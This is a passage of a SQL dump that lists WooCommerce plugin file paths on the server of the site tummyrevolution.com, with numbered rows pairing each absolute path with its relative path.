/class-wc-queue-interface.php'),(7713,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-shipping-zone-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-shipping-zone-data-store-interface.php'),(7714,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/interfaces/class-wc-webhooks-data-store-interface.php','wp-content/plugins/woocommerce/includes/interfaces/class-wc-webhooks-data-store-interface.php'),(7715,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-order.php','wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-order.php'),(7716,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-payment-token.php','wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-payment-token.php'),(7717,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-product.php','wp-content/plugins/woocommerce/includes/legacy/abstract-wc-legacy-product.php'),(7718,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-coupons-controller.php','wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-coupons-controller.php'),(7719,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-orders-controller.php','wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-orders-controller.php'),(7720,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-products-controller.php','wp-content/plugins/woocommerce/includes/legacy/api/class-wc-rest-legacy-products-controller.php'),(7721,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-authentication.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-authentication.php'),(7722,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-coupons.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-coupons.php'),(7723,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-customers.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-customers.php'),(7724,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-json-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-json-handler.php'),(7725,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-orders.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-orders.php'),(7726,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-products.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-products.php'),(7727,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-reports.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-reports.php'),(7728,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-resource.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-resource.php'),(7729,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-server.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-server.php'),(7730,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-xml-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/class-wc-api-xml-handler.php'),(7731,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v1/interface-wc-api-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v1/interface-wc-api-handler.php'),(7732,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-authentication.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-authentication.php'),(7733,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-coupons.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-coupons.php'),(7734,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-customers.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-customers.php'),(7735,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-exception.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-exception.php'),(7736,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-json-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-json-handler.php'),(7737,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-orders.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-orders.php'),(7738,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-products.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-products.php'),(7739,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-reports.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-reports.php'),(7740,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-resource.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-resource.php'),(7741,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-server.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-server.php'),(7742,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-webhooks.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/class-wc-api-webhooks.php'),(7743,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v2/interface-wc-api-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v2/interface-wc-api-handler.php'),(7744,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-authentication.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-authentication.php'),(7745,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-coupons.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-coupons.php'),(7746,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-customers.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-customers.php'),(7747,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-exception.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-exception.php'),(7748,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-json-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-json-handler.php'),(7749,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-orders.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-orders.php'),(7750,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-products.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-products.php'),(7751,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-reports.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-reports.php'),(7752,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-resource.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-resource.php'),(7753,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-server.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-server.php'),(7754,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-taxes.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-taxes.php'),(7755,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-webhooks.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/class-wc-api-webhooks.php'),(7756,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/api/v3/interface-wc-api-handler.php','wp-content/plugins/woocommerce/includes/legacy/api/v3/interface-wc-api-handler.php'),(7757,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-api.php','wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-api.php'),(7758,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-cart.php','wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-cart.php'),(7759,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-coupon.php','wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-coupon.php'),(7760,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-customer.php','wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-customer.php'),(7761,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-shipping-zone.php','wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-shipping-zone.php'),(7762,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-webhook.php','wp-content/plugins/woocommerce/includes/legacy/class-wc-legacy-webhook.php'),(7763,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/libraries/class-wc-eval-math.php','wp-content/plugins/woocommerce/includes/libraries/class-wc-eval-math.php'),(7764,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/libraries/wp-async-request.php','wp-content/plugins/woocommerce/includes/libraries/wp-async-request.php'),(7765,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/libraries/wp-background-process.php','wp-content/plugins/woocommerce/includes/libraries/wp-background-process.php'),(7766,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-db.php','wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-db.php'),(7767,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-email.php','wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-email.php'),(7768,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-file.php','wp-content/plugins/woocommerce/includes/log-handlers/class-wc-log-handler-file.php'),(7769,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/payment-tokens/class-wc-payment-token-cc.php','wp-content/plugins/woocommerce/includes/payment-tokens/class-wc-payment-token-cc.php'),(7770,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/payment-tokens/class-wc-payment-token-echeck.php','wp-content/plugins/woocommerce/includes/payment-tokens/class-wc-payment-token-echeck.php'),(7771,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/queue/class-wc-action-queue.php','wp-content/plugins/woocommerce/includes/queue/class-wc-action-queue.php'),(7772,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/queue/class-wc-queue.php','wp-content/plugins/woocommerce/includes/queue/class-wc-queue.php'),(7773,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/class-experimental-abtest.php','wp-content/plugins/woocommerce/includes/react-admin/class-experimental-abtest.php'),(7774,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/connect-existing-pages.php','wp-content/plugins/woocommerce/includes/react-admin/connect-existing-pages.php'),(7775,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/core-functions.php','wp-content/plugins/woocommerce/includes/react-admin/core-functions.php'),(7776,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/emails/html-admin-report-export-download.php','wp-content/plugins/woocommerce/includes/react-admin/emails/html-admin-report-export-download.php'),(7777,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/emails/html-merchant-notification.php','wp-content/plugins/woocommerce/includes/react-admin/emails/html-merchant-notification.php'),(7778,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/emails/plain-admin-report-export-download.php','wp-content/plugins/woocommerce/includes/react-admin/emails/plain-admin-report-export-download.php'),(7779,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/emails/plain-merchant-notification.php','wp-content/plugins/woocommerce/includes/react-admin/emails/plain-merchant-notification.php'),(7780,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/feature-config.php','wp-content/plugins/woocommerce/includes/react-admin/feature-config.php'),(7781,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/page-controller-functions.php','wp-content/plugins/woocommerce/includes/react-admin/page-controller-functions.php'),(7782,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/react-admin/wc-admin-update-functions.php','wp-content/plugins/woocommerce/includes/react-admin/wc-admin-update-functions.php'),(7783,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Telemetry/class-wc-rest-telemetry-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Telemetry/class-wc-rest-telemetry-controller.php'),(7784,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-coupons-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-coupons-v1-controller.php'),(7785,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-customer-downloads-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-customer-downloads-v1-controller.php'),(7786,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-customers-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-customers-v1-controller.php'),(7787,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-order-notes-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-order-notes-v1-controller.php'),(7788,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-order-refunds-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-order-refunds-v1-controller.php'),(7789,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-orders-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-orders-v1-controller.php'),(7790,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-attribute-terms-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-attribute-terms-v1-controller.php'),(7791,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-attributes-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-attributes-v1-controller.php'),(7792,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-categories-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-categories-v1-controller.php'),(7793,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-reviews-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-reviews-v1-controller.php'),(7794,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-shipping-classes-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-shipping-classes-v1-controller.php'),(7795,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-tags-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-product-tags-v1-controller.php'),(7796,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-products-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-products-v1-controller.php'),(7797,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-report-sales-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-report-sales-v1-controller.php'),(7798,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-report-top-sellers-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-report-top-sellers-v1-controller.php'),(7799,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-reports-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-reports-v1-controller.php'),(7800,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-tax-classes-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-tax-classes-v1-controller.php'),(7801,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-taxes-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-taxes-v1-controller.php'),(7802,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-webhook-deliveries-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-webhook-deliveries-v1-controller.php'),(7803,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-webhooks-v1-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version1/class-wc-rest-webhooks-v1-controller.php'),(7804,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-coupons-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-coupons-v2-controller.php'),(7805,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-customer-downloads-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-customer-downloads-v2-controller.php'),(7806,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-customers-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-customers-v2-controller.php'),(7807,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-network-orders-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-network-orders-v2-controller.php'),(7808,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-order-notes-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-order-notes-v2-controller.php'),(7809,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-order-refunds-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-order-refunds-v2-controller.php'),(7810,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-orders-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-orders-v2-controller.php'),(7811,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-payment-gateways-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-payment-gateways-v2-controller.php'),(7812,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-attribute-terms-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-attribute-terms-v2-controller.php'),(7813,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-attributes-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-attributes-v2-controller.php'),(7814,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-categories-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-categories-v2-controller.php'),(7815,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-reviews-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-reviews-v2-controller.php'),(7816,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-shipping-classes-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-shipping-classes-v2-controller.php'),(7817,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-tags-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-tags-v2-controller.php'),(7818,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-variations-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-variations-v2-controller.php'),(7819,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-products-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-products-v2-controller.php'),(7820,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-report-sales-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-report-sales-v2-controller.php'),(7821,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-report-top-sellers-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-report-top-sellers-v2-controller.php'),(7822,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-reports-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-reports-v2-controller.php'),(7823,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-setting-options-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-setting-options-v2-controller.php'),(7824,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-settings-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-settings-v2-controller.php'),(7825,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-methods-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-methods-v2-controller.php'),(7826,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-zone-locations-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-zone-locations-v2-controller.php'),(7827,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-zone-methods-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-zone-methods-v2-controller.php'),(7828,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-zones-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-shipping-zones-v2-controller.php'),(7829,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-system-status-tools-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-system-status-tools-v2-controller.php'),(7830,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-system-status-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-system-status-v2-controller.php'),(7831,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-tax-classes-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-tax-classes-v2-controller.php'),(7832,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-taxes-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-taxes-v2-controller.php'),(7833,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-webhook-deliveries-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-webhook-deliveries-v2-controller.php'),(7834,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-webhooks-v2-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-webhooks-v2-controller.php'),(7835,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-controller.php'),(7836,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-coupons-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-coupons-controller.php'),(7837,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-crud-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-crud-controller.php'),(7838,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-customer-downloads-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-customer-downloads-controller.php'),(7839,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-customers-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-customers-controller.php'),(7840,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-data-continents-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-data-continents-controller.php'),(7841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-data-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-data-controller.php'),(7842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-data-countries-controller.php','wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-data-countries-controller.php'),(7843,'/home/tummmyov/t